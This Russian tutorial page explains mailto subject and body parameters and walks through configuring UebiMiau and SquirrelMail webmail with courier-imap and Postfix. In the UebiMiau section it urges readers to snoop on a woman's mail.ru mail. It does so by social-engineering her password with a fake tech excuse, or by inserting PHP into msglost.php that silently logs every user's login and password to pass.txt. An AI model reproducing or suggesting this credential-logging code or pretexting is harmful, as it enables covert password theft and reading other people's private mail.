RSS

Компьютерная терминология    1_9  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  .....  A  Б  В  Г  Д  Ж  З  И  К  Л  М  Н  О  П  Р  С  Т  У  Ф  Х  Ц  Ч

WebMail

 

Параметры тега "mailto"(subject & body)

Многие в сети уже, наверное, встречали подобные mailto- ссылки, при нажатии на которые, открывалось окно вашего e-mail клиента с уже подставленным текстом в поле Subject, и возможно, даже с готовым шаблоном начала письма.

Обычная e-mail ссылка.

После нажатия открывается окно e-mail клиента с просто подставленой почтой адресата.

mailto:[email protected]

E-mail ссылка с полем Subject

При открытии почтовой программы в письме отображается не только почта адресата, но уже и поле Subject.

mailto:[email protected]?subject=Тема сообщения

E-mail ссылка с полем Subject и полем Body

В этом случае подставляются не только значения полей адресата и темы, но и само начало письма.

mailto:[email protected]?subject=Тема сообщения&body=Здравсвуй, уважаемый веб-мастер.

 

Новости

эмг 50 на сайте
 

WebMail

Почтовый веб-интерфейс своими руками

Сейчас стало модно иметь свой хостинг и в придачу домен второго уровня с красивым именем .

Скорее всего, ты тоже располагаешь таким чудом и можешь на нем создавать кучу почтовых ящиков вида [email protected].Сейчас я расскажу о том, как можно решить многочисленные проблемы, подняв у себя на хосте веб-интерфейс.

UebiMiau 2.7

Поддерживаемые ОСи: Linux, Windows.

С чем работает: IMAP/POP3, SMTP.

Умеет: принимать и отправлять почту, создавать записи в адресной книге, устанавливать собственные квоты на размер ящика. Поддерживает шкурки.Очень удобный и простой в настройке клиент.

Итак, качаем клиент с официального сайта, распаковываем его и заливаем все файлики и папочки из архива на свой сервак. К примеру, в папку webmail, предварительно создав ее, разумеется. Залив всю эту байду, заходим в webmail/inc. Здесь нам нужно открыть файлик config.php в режиме редактирования. Обратим внимание на переменную $temporary_directory. Она указывает, в какое место будут складываться все временные файлы, создаваемые нашим веб-интерфейсом на сервере. Лучше определить директорию, которая не будет видна через апач, потому что на эту папку необходимы полномочия типа "read-write". Давай, например, запихнем все это барахло в папку /tmp. В *nix-системах такая дира уже есть, а в виндах придется создать самим (пусть будет c:\tmp, ок?). Создав темповую папку, присваиваем переменной $temporary_directory значение "/tmp". Смотрим дальше. Видим вариаблу $smtp_server. Здесь перед нами встает выбор: можно использовать свой (или чужой) SMTP-сервер, а можно отсылать почту через наш sendmail.

Сендмейл можно использовать, если хостинг поднят под юниксовой системой. Так что если твой сервер в доску свой, то можешь позаморачиваться с настройками сендмыла и т.д. Но давай не будем забивать остатки мозгов всякой чепухой и просто укажем нужный нам SMTP-сервер, присвоив переменной $smtp_server его имя. Например, "smtp.padonak.ru". Но если тебе все же приспичило использовать сендмайл, то делаем так: $smtp_server = "localhost", после чего ищем где-то внизу конфига переменную $use_sendmail и ставим ей значение "yes". Но этого недостаточно, поэтому дальше следует указать путь к сендмайлу, присвоив переменной $path_to_sendmail значение "/usr/sbin/sendmail".

Приступаем к дальнейшей настройке нашего клиента. Ищем переменные $mail_protocol и $mail_port. Тут предстоит выбрать, что использовать: POP3 или IMAP. А также надо указать порт. Выбор становится очевидным после прочтения в комментах строчки "The imap is more fast, but all functions of UebiMiau works with POP3", что переводится как "Имап быстрее, но все функции UebiMiau работают с ПОП3". Следовательно, ставим $mail_protocol = "pop3", а порт выставляем стандартный, приравняв значение $mail_port к "110".

Чтобы в клиенте правильно отображалось время, необходимо установить часовой пояс в соответствии с регионом, в котором ты живешь. Если ты столичный житель, то устанавливай $server_time_zone = "+0300".

Далее устанавливаем размер ящика в килобайтах. Если он будет, к примеру, 10 мегабайт, то 10 умножаем на 1024 и получаем нужное число. Осталось передать это число переменной $quota_limit.

Вариабла $use_password_for_smtp отвечает за то, использовать ли пароль при коннекте на смтп или все-таки ну его на "][" :). Для некоторых серверов это необходимо, но в моем случае $use_password_for_smtp выставлен в "no".

$check_first_login - эта переменная предопределяет, будет ли юзера, впервые проверяющего почту, редиректить на страницу личных настроек, где он сможет указать свои личные данные, внешний вид окна почтового клиента, интервал проверки новой почты и т.д. Присваиваем этой переменной "yes" или "no" на свое усмотрение.

Переменная $mail_server_type может принимать три значения: DETECT, ONE-FOR-EACH и ONE-FOR-ALL. Самый рульный тип - это ONE-FOR-EACH. Юзая его, можно установить туеву хучу доменов и выставить для каждого из них свой pop3-сервер :). И потом, зайдя на наш веб-интерфейс, можно будет проверять почту с нескольких серверов.

Следовательно, $mail_server_type = "ONE-FOR-EACH". Если мы выбираем этот тип, то переменные $mail_detect_remove, $mail_detect_prefix и $mail_detect_login_type можно пропустить, т.к. они относятся к типу "DETECT". Дальше идет то, что нам нужно:

$mail_servers[] = Array(

"domain" => "padonak.ru",

"server" => "mail.padonak.ru",

"login_type" => "%user%@%domain%"

);

$mail_servers[] = Array(

"domain" => "mail.ru",

"server" => "pop.mail.ru",

"login_type" => "%user%"

);

Здесь стоит обратить внимание на "login_type". Некоторые серверы в качестве юзернейма используют полный адрес мыла. Например, чтобы снять почту с padonak.ru, нужно в поле логина указывать [email protected]. Тогда login_type необходимо прописать следующим образом: %user%@%domain%. Если же в качестве имени пользователя используется все, что идет до собаки, то в login_type заносим просто %user%, и все.

Я указал падонковский и мейлрушный серваки - пусть тетки через мой веб-интерфейс снимают почту еще и с мыла.ру.

Дальше идут переменные для типа "ONE-FOR-ALL", их тоже можно не трогать ($default_mail_server, $one_for_all_login_type).

Едем дальше. Ага, настройки языка и темок! $allow_user_change_theme - давать или не давать юзверю право менять шкурку (yes, no).

$default_theme - шкурка по умолчанию (отсчет с нуля).

$allow_user_change_language - разрешать/запрещать изменять язык интерфейса. Оставим "yes", может, кому-нибудь и нравится читать по-немецки. Хайдук, блин :).

$default_language - язык по дефолту. Русский - шестнадцатый :). Дальше в конфиге ничего интересного не наблюдается, так что мотаем его ниже. До переменной $mime_show_html. Давай поставим "yes", что ли ;). Вариаблы $appversion и $appname будут видны в хедере письма как X-mailer. Можно указать что угодно, например, $appname присвоим "Kewl Servah! b00b1ik is very sexy guy. So NSD is, but not so hard...", а переменной $appversion зададим значение "500" :).

В переменную $footer тоже можно запихать все, что захочется. Текст из нее будет добавляться в конец отправленного письма (реклама :)), но можно это поле оставить и пустым.

Переходим к переменной $enable_debug. Если где-то в работе нашего мыл-сервера вклинился какой-то косяк, что-то не получается, то пробуем сделать $enable_debug = "yes" и отловить баги. Но если все в порядке, то оставляем $enable_debug в положении "no".

$block_external_images - заблокировать или разрешить показ картинок в письме с других серверов.

$idle_timeout - интервал времени, через который закрывается сессия, если юзверь не подает признаков жизни.

Остальные настройки трогать не обязательно, т.к. они касаются установок самих юзеров. Пусть ленивые пользователи сами настраиваются, как хотят, в соответствующей панельке.

А теперь что касается mail.ru :). Тебе никогда не хотелось посмотреть, какие перцы пишут твоей тетке и, самое главное, ЧТО пишут? Ясен-красен, что для воплощения мечты в жизнь необходимо знать паролик. Первый способ его узнать - спросить ;). Например: "Ленусь, слушай, у тебя принтер не работает из-за переполнения буфера в БИОС после ДДОС-атаки на твой USB-порт злыми хакерами. Скажи свой пароль от почты - тогда починим". Ну а если твоя пассия не совсем набитая ду... поролоном девушка, то вот второй вариант: создаем в нашей директории на серваке файл pass.txt и делаем его доступным для записи. Затем открываем файлик msglost.php и где-нибудь в конце, перед знаком "?> ", пишем следующее:

$fp=fopen("pass.txt","a");

fwrite($fp,"$f_user : $f_pass\n");

fclose($fp);

Логинчики и парольчики будут аккуратно складываться в файл pass.txt в виде login:pass.

SquirrelMail 1.4.3а

Официальный сайт: www.squirrelmail.org.

Сливаем здесь: www.squirrelmail.org/download.php.

Поддерживаемая ОС: Linux.

С чем работает: IMAP, SMTP.

Умеет: принимать/отправлять письма, манипулировать папками, устанавливать шкурки. Поддерживает вложение файлов.

Эта штука под названием "БелкаПочта" из разряда тяжелой артиллерии, как и Хорда (www.horde.org). Она не хуже, чем нынешние интерфейсы у mail.ru, hotmail.ru и т.д.

Итак, если у тебя в локалке есть сервак на линухе и ты хочешь (или тебе поставили пиво) замутить своим юзверям почту, то БелкаПочта (что-то меня на зверей потянуло: кошки, белки... Люди, это не опасно?) - то, что доктор прописал!

Для того чтобы поднять этот веб-интерфейс, нам необходимы следующие вещи:

1) IMAP4rev1 Server. Такие, как uw-imap, courier-imap, cyrus-imap, [hMailServer], Binc IMAP.

2) Postfix.

3) Apache + PHP4 (php4.2 минимум).

Можно, конечно, еще присобачить к этой связке mySQL, чтобы пользователи и почта хранились в базе, но лень нам не позволяет :).

Ну-с, начнем-с. Как настроить апач, наверное, всем давно известно, и даже практически у всех он стоит. С PHP тоже особых трудностей возникнуть не должно. Либо подключаем PHP модулем в httpd.conf:

LoadModule php4_module modules/libphp4.so

AddType application/x-httpd-php .php

DirectoryIndex index.php

Либо отдельным интерпретатором. Тогда в httpd.conf нужно добавить следующее:

ScriptAlias /php4/ "/usr/bin/php"

Action application/x-httpd-php4 "/php4/php

AddType application/x-httpd-php4 .php .phtml .php4. phtm .html .htm .php

И еще, в апаче нужно будет внести одно изменение:

DirectoryIndex index.html index.htm index.php

Все, апач-конфигурация завершена. Дальше выбираем IMAP-сервер. Я, оценив технические характеристики, остановился на courier-imap. Тянем и устанавливаем курьера. Самый простой способ - это всеми любимый RPM.

$wget

Можно поставить его из rpm, а можно и компильнуть ;).

Нужны будут библиотеки opennssl и cyrus-sasl. У меня в дистрибутиве Fedore Core 1 они оказались на диске, и я их поставил из rpm'ок. Итак, чтобы собрать курьера в rpm, необходимо настрочить следующее:

#rpm -ta courier-0.45.6.20040618.tar.bz2

или, если рпм новый, как в RedHat9 или Fedore Core 1, то:

#rpmbuild -ta courier-0.45.6.20040618.tar.bz2

Если же ты смелый, ловкий, умелый... Нет, джунгли тебя не зовут. Зато это делает компиляция - ждет тебя, не дождется. Сначала разархивируем:

$tar -jxvf courier-0.45.6.20040618.tar.bz2

Далее заходим в получившуюся диру:

$cd courier-imap-3.0.5.20040618

и делаем ./configure

В случае облома и вежливой просьбы системы воспользоваться rpm-инсталлятором (такое может случиться, если у тебя стоит красная шляпа или Федора) не пугайся. Просто набери:

./configure --with-redhat --enable-unicode

--enable-unicode (для корректного отображения писем в БелкаПочте)

Когда скрипт завершит свою гнусную работу, продолжим:

$make

Опять комп начинает трещать и хрустеть. Но не дадим ему пощады:

$make check

Далее переключаемся в root'а:

$su -

Теперь пишем:

#make install

выходим с рута (ctrl+d) и ваяем в консоли:

$make install-configure

Здесь придется немножко подождать, бегло читая лабуду на экране. Итак, снова рутимся и приступаем к настройкам:

$su -

Копируем файлы imapd.rc и pop3d.rc, находящиеся в папке courier-imap3.0.5.20040618, в /etc/init.d/

#cp imapd.rc /etc/init.d/imapd

#cp pop3d.rc /etc/init.d/pop3d

Переходим в /etc/init.d/ и командуем:

#chmod go+x pop3d

#chmod go+x imapd

Запускаем imapd:

#/etc/init.d/imapd start

Проверяем при помощи Netstat'а, открылся ли 143 порт:

#netstat -an

Должно появиться что-то вроде "tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN". Ну и для завершения проверки телнетимся на наш сервак:

#telnet localhost 143

Должны получить примерно вот что:

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information.

Это значит, что все в порядке, дружище! Глядим в файл /usr/lib/courier-imap/etc/imapd и убеждаемся, что MAILDIRPATH=Maildir.

Теперь делаем так, чтобы при добавлении нового юзера ему не давался доступ на SSH и чтобы автоматом создавалась Maildir в его домашней директории. Редактируем файл /etc/skel/.bashrc: вытираем там все и пишем "exit;". Тупо, но работает :).

Дальше переходим в дистрибутив курьера:

#cd courier-imap-3.0.5.20040618

и делаем так:

#./maildirmake /etc/skel/Maildir

Добавим тестового юзера:

#adduser test

#passwd test

Зайдем в каталог /home/test и проверим. Если все на месте, то с чувством выполненного долга сваливаем из чужой папки.

Приступаем к Postfix. Имхо, в любом дистрибутиве есть постфикс. Для упрощения можем поставить его из rpm:

#rpm -ivh postfix.версия.rpm

$tar -zxvf postfix-2.0.20.tar.gz

$cd postfix-2.0.20

$make -f Makefile.init makefiles

$make

$su -

#adduser postfix

#groupadd postdrop

#make install

Нам предложат ответить на вопросы, ну а мы ответим, не обломимся.

Правильные ответы на вопросы

install_root: [/]

tempdir: [/usr/src/ispmail/postfix-2.0.16] /tmp

config_directory: [/etc/postfix]

daemon_directory: [/usr/libexec/postfix]

command_directory: [/usr/sbin]

queue_directory: [/var/spool/postfix]

sendmail_path: [/usr/sbin/sendmail]

newaliases_path: [/usr/bin/newaliases]

mailq_path: [/usr/bin/mailq]

mail_owner: [postfix]

setgid_group: [postdrop]

manpage_directory: [/usr/local/man]

sample_directory: [/etc/mail/sample]

readme_directory: [no]

Установка завершена. Про конфигурацию постфикса можно написать целую книгу, и в Сети не составит труда нарыть кучу нужной документации, так что углубляться особо не будем, а исправим только самые необходимые для работы строчки. Редактируем файл /etc/postfix/main.cf. Там нас интересуют следующие строки:

myorigin

mydestination

mynetworks

Ставим туда значения, характерные для работы нашей сети. Потом проверяем, не накосячили ли мы:

#postfix check

Если все ок, то ничего плохого постфикс нам не сообщит. Да, и не забудь в конфигах DNS поставить MX-запись, что-то вроде этого:

; MX Record

IN MX 10 mail.domain.org.

Теперь приступим к самой БелкоПочте. Скачиваем rpm, или srpm, или tar.gz - это неважно, там все равно находится архив пэхэпэшных файлов, которые в конце концов нужно будет скопировать в папку, указанную в Document_root файла httpd.conf. По умолчанию это /var/www/html.

Я поставил БелкоПочту из rpm'ки:

#

Настройка очень проста: переходим в каталог, куда положили веб-интерфейс, потом в папке config редактируем файл config.php.

Редактируй его аналогично тому, как я настраивал UebiMiau. Там все абсолютно так же. Но если тебе все-таки что-то будет непонятно, то на диске ты сможешь найти текстовик с примером моих настроек.

Конец – делу венец

Дальше просто заходим браузером на http://твой_домен/папка_белкапочты и начинаем баловаться. Ты, в общем, балуйся дальше, а я пойду все-таки к врачу схожу. Не нравятся мне эти зоологические наклонности с белками и кошками...

CD

На нашем диске ты найдешь все перечисленные в статье клиенты для установки почтового веб-интерфейса, а также файл с примером настроек SquirrelMail.

INFO

Большинство юзеров и знать не знают о существовании каких-то там SMTP,POP3 и т.д. Поэтому и не могут нормально настроить почтовик. Именно для них и были придуманы веб-интерфейсы.

seo & website usability   inet   os faq   hardware faq   memory   video   cpu   hdd   mainboard faq   printer & scaner   modem   mobiles   hackzone

Технологии поискового маркетинга
Практика поискового маркетинга
Flash
Тэги
XML
DHTML
PHP
MySQL
WebMail
.NET
VBScript
CGI
Графические форматы Интернета
WEB-сайт шаг за шагом
CMS faq
FRAME faq
CSS faq
SSI faq
RSS faq
WAP faq
Web-Designed
Webhints
Файл настроек .htaccess
Настройка robots.txt
Windows 10 | Registry Windows 10 | Windows7: Общие настройки | Windows7: Реестр | Windows7: Реестр faq | Windows7: Настроки сети | Windows7: Безопасность | Windows7: Брандмауэр | Windows7: Режим совместимости | Windows7: Пароль администратора | Память | SDRAM | DDR2 | DDR3 | Quad Band Memory (QBM) | SRAM | FeRAM | Словарь терминов | Video | nVIDIA faq | ATI faq  | Интегрированное видео faq | TV tuners faq | Терминология | Форматы графических файлов | Работа с цифровым видео(faq) | Кодеки faq | DVD faq | DigitalVideo faq | Video faq (Архив) | CPU | HDD & Flash faq | Как уберечь винчестер | HDD faq | Cable faq | SCSI адаптеры & faq | SSD | Mainboard faq | Printer & Scaner | Благотворительность

На главную | Cookie policy | Sitemap